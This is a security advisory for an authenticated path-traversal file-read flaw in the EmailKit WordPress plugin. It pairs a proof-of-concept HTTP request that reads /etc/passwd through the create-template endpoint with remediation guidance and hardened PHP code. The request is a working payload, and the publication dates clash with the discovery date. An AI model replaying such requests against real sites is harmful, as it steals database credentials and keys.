CVE-2025-14059 affects Email Kit and is a local file inclusion vulnerability that turns a normal email template feature into a reliable arbitrary file read primitive for an authenticated Author-level user. The key reason it is serious is that it is not only about reading a file on the server. It also provides a built-in exfiltration channel, because the stolen file content can be delivered outward through MetForm confirmation emails to an attacker-controlled mailbox. On real sites this means an Author account, which is common on marketing and content teams, can reach high-value secrets like wp-config.php database credentials and authentication keys without needing administrator access, and without any direct file download feature being present.

CVE: CVE-2025-14059
Plugin Version: EmailKit <= 1.6.1
All Time: 316 000
Active installations: 60 000+
Publicly Published: January 6, 2025
Last Updated: January 6, 2025
Researcher: Dmitrii Ignatyev
PoC: Yes
Exploit: No
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-14059
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/emailkit/emailkit-161-authenticated-author-arbitrary-file-read-via-path-traversal
https://t.me/cleantalk_researches/379

Timeline

November 27, 2025: Plugin testing and vulnerability detection in Email Kit were completed
November 27, 2025: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
January 6, 2025: Registered CVE-2025-14059

Discovery of the Vulnerability

The bug sits in the Email Kit MetForm integration, where the REST endpoint used to create a template accepts a user-supplied template path and later passes it to file_get_contents without enforcing a safe base directory or an allow list of template files. In the attack flow the Author submits a request to the create-template endpoint and sets the emailkit-editor-template parameter to an absolute path such as /etc/passwd or to a relative traversal path reaching wp-config.php. Because there is no real path normalization and no prefix check, the plugin reads the target file and stores its content in the template content field that will later be used as an email body. The critical security failure is that the plugin validates the request with a nonce but does not validate what the path is allowed to be, so a feature intended to load an editor template becomes a server file reader controlled by the attacker.

Understanding LFI attacks

Local file inclusion in WordPress plugins often becomes catastrophic because WordPress installations routinely store secrets in predictable locations and formats. The most obvious target is wp-config.php, which can expose database credentials, table prefixes, salts, and sometimes hardcoded API tokens or SMTP credentials. On Linux hosts, /etc/passwd can reveal usernames and service accounts that help an attacker tailor follow-on attacks, and on shared hosting the ability to read neighboring configuration files can become a cross-site reconnaissance tool. What makes CVE-2025-14059 stand out is the combination of LFI with an exfiltration mechanism. Even if the attacker cannot see server responses directly, they can force the server to send the file contents outward through a confirmation email, which is why this becomes.

Exploiting the LFI Vulnerability

To exploit CVE-2025-14059, an attacker with Author+ cookies:

POC:

0) Preparation: activate Elementor, MetForm and EmailKit (plus SMTP Server or the wpml_plugin_log plugin), all with a standard installation.
Create a new form with a required Email field and a submit button.
Add "Confirmation" and "Notification" to this form as usual.
Add the form's shortcode to any post.
Test the form and check the messages in SMTP/inbox/plugin log.
1) Send this request as an Author+ user:
POST /wordpress/index.php?rest_route=/emailkit/v1/create-template HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php
X-WP-Nonce: 423d6c2f27
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=3%7C1764443008%7CRjm5qxO19GkyJTIVWyibTEPAFUZowEf3R8sKMlHc4st%7Cd769097093f4c352387040ef525437b6d761d9296c6a237a232eff44373f9362; wp-settings-4=libraryContent%3Dbrowse; wp-settings-time-4=1764270208; spbc_secfw_ip_wl=adb2a133b016d4aeea259f85a613874f; bWYtY29va2ll=%242y%2412%24MKaker8pQx79%2Fu57DYjUf.jpiZrUbzt2v552Peg%2FtBZDe0sQIEKp.; spbc_is_logged_in=632abd71892139e01786143ba5519731; spbc_log_id=443; spbc_timer=1764270209; spbc_cookies_test=%7B%22cookies_names%22%3A%5B%22spbc_log_id%22%2C%22spbc_timer%22%5D%2C%22check_value%22%3A%22b5ccad2c02d1442f4b9f96881e34359d%22%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Content-Type: application/x-www-form-urlencoded
Content-Length: 101

form_id=152&template_title=test&emailkit_email_type=metform_form&emailkit-editor-template=/etc/passwd
2) Check the resulting email message for the contents of /etc/passwd.


The impact is high confidentiality loss with realistic escalation paths. Reading wp-config.php can immediately yield database credentials and WordPress authentication salts, which can enable database extraction, session forgery in some scenarios, or offline attacks against stored hashes depending on the environment. Exfiltration through email makes this even more damaging because it bypasses many defensive assumptions, such as lack of direct file download routes or restricted file system permissions on the web layer. A compromised Author account becomes a stepping stone to full site compromise because once secrets are obtained the attacker can pivot into database access, plugin settings theft, and further credential reuse. In marketing oriented sites, where MetForm is used for lead capture and Email Kit is used for templated notifications, the attacker can also hide the exfiltration in normal looking mail flows, which makes detection harder. The result is silent secret theft that looks like legitimate form traffic unless administrators are watching carefully.

Recommendations for Improved Security

The correct remediation is to treat any path parameter as untrusted and restrict it to safe, known locations. The plugin should normalize the provided path with realpath and enforce that it resides under an allow listed directory dedicated to Email Kit templates, and it should reject absolute paths and any traversal sequences. It should also avoid reading arbitrary files based on a request parameter at all, and instead reference templates by internal identifiers mapped to packaged assets. On the MetForm side, confirmation email bodies should not be filled from untrusted stored HTML that can be derived from filesystem reads, and template creation should require stricter capabilities than publish_posts if it can influence site wide email content. As operational mitigations while patching, reduce who has Author access, disable unnecessary confirmation emails, and review recent Email Kit template creations and MetForm bindings for unexpected template content. Finally rotate secrets if exposure is suspected, especially database credentials and WordPress salts, because once they are leaked they must be treated as compromised.
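To make the remediation concrete, the following is an added example written for this page, not code from EmailKit or MetForm. It places a simplified reconstruction of the pattern described in the discovery section (nonce-checked request, parameter passed straight to file_get_contents) beside a hardened loader that references templates by identifier, resolves the mapped file with realpath, enforces the allow-listed directory prefix, and registers the REST route with a stronger capability than publish_posts. The template directory, the identifier table and the ek_ function names are assumptions; the hook, route and WordPress API calls are standard.

```php
<?php
// Added illustration, not EmailKit's or MetForm's code. Assumes the plugin
// ships packaged HTML templates in a "templates" subfolder of its own directory.
define('EK_TEMPLATE_DIR', __DIR__ . '/templates'); // assumed location

// Vulnerable pattern (simplified reconstruction of what the advisory describes):
// the nonce only proves the request came from a logged-in user's page; nothing
// constrains the path, so "/etc/passwd" or "../../wp-config.php" is read verbatim.
function ek_load_template_unsafe(array $request) {
    return file_get_contents($request['emailkit-editor-template']);
}

// Hardened loader: the request names a template identifier, never a path.
// The identifier is mapped to a packaged asset and the resolved location is
// still canonicalised and prefix-checked as defence in depth.
function ek_load_template_safe(string $template_id) {
    // Allow list of identifiers the editor may request (constructed example).
    $allowed = [
        'blank'   => 'blank.html',
        'welcome' => 'welcome.html',
        'receipt' => 'receipt.html',
    ];
    if (!isset($allowed[$template_id])) {
        return false; // unknown identifier: never fall back to the raw value
    }
    $base = realpath(EK_TEMPLATE_DIR);
    $full = realpath(EK_TEMPLATE_DIR . DIRECTORY_SEPARATOR . $allowed[$template_id]);
    if ($base === false || $full === false) {
        return false; // directory or file does not exist
    }
    // Even an allow-listed entry must resolve inside the base directory
    // (guards against symlinked files or a mis-edited table).
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    return file_get_contents($full);
}

// REST registration: require a capability stronger than publish_posts, and
// validate the parameter's shape before the callback ever runs.
add_action('rest_api_init', function () {
    register_rest_route('emailkit/v1', '/create-template', [
        'methods'             => 'POST',
        'permission_callback' => function () {
            return current_user_can('manage_options');
        },
        'args' => [
            'emailkit-editor-template' => [
                'required'          => true,
                'validate_callback' => function ($value) {
                    // identifiers only: no slashes, dots or separators of any kind
                    return is_string($value) && preg_match('/^[a-z0-9_-]{1,64}$/', $value) === 1;
                },
            ],
        ],
        'callback' => function (WP_REST_Request $req) {
            $body = ek_load_template_safe($req->get_param('emailkit-editor-template'));
            if ($body === false) {
                return new WP_Error('ek_bad_template', 'Unknown template', ['status' => 400]);
            }
            // The template post would be created here with $body as its content.
            return rest_ensure_response(['ok' => true]);
        },
    ]);
});
```

Note that the validate_callback alone already rejects every value in the proof of concept, since neither "/etc/passwd" nor a traversal string matches the identifier pattern; the realpath prefix check in the loader is kept so that the protection does not depend on a single regular expression staying correct.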

By taking proactive measures to address LFI like CVE-2025-14059 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.


Dmitrii I.
CVE-2025-14059 – Email Kit – Local File Inclusion (LFI) Author+ – POC
